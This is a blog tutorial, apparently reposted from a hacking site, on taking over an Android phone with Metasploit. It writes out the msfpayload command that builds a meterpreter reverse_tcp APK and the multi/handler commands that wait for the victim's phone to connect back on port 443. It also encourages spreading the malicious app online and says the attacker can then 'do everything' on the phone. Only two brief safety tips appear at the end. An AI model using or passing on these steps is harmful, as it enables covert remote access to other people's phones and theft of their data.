Hacking Android Smartphone Tutorial Using Metasploit

Published by Sundareswaran on

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose an android phone for this tutorial? simply because lately Android phone growing very fast worldwide. Here in China, you can get an android phone for only US$ 30 it’s one of the reasons why Android growing fast.

What is Android? according to Wikipedia:

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.

and what is APK? according to Wikipedia:

Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google’s Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.

Here is some initial information for this tutorial:

Attacker IP address:

Attacker port to receive connection: 443


1. Metasploit framework (we use Kali Linux 1.0.6l)

2. Android smartphone (we use HTC One android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T)

2. We will utilize Metasploit payload framework to create exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

As described above that attacker IP address is, below is our screenshot when executed the command

Hacking Android Smartphone Tutorial using Metasploit

3. Because our payload is reverse_tcp where attacker expects the victim to connect back to attacker machine, the attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsoleto go to the Metasploit console.

Hacking Android Smartphone Tutorial using Metasploit


use exploit/multi/handler –> we will use Metasploit handler

set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

Hacking Android Smartphone Tutorial using Metasploit


set lhost –> attacker IP address

set lport 443 –> port to listen the reverse connection

exploit –> start to listen incoming connection

5. Attacker already has the APK’s file and now he will start distributing it (I don’t need to describe how to distribute this file, the internet is a good place for distribution 🙂 ).

6. Short stories the victim (me myself) download the malicious APK’s file and install it. After victim open the application, attacker Metasploit console get something like this:

Hacking Android Smartphone Tutorial using Metasploit

7. It’s mean that attacker already inside the victim android smartphone and he can do everything with victim phone.

Hacking Android Smartphone Tutorial using Metasploit

See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:


1. Don’t install APK’s from the unknown source.

2. If you really want to install APK’s from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK’s in this tutorial.

Hacking Android Smartphone Tutorial using Metasploit

Credits to: Hacking-Tutorial.com

Categories: Hacking Tutorial

1 Comment

Stock Firmware · March 23, 2019 at 7:50 pm

Hurrah, that’s what I was exploring for, what a stuff!

present here at this website, thanks admin of this web

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.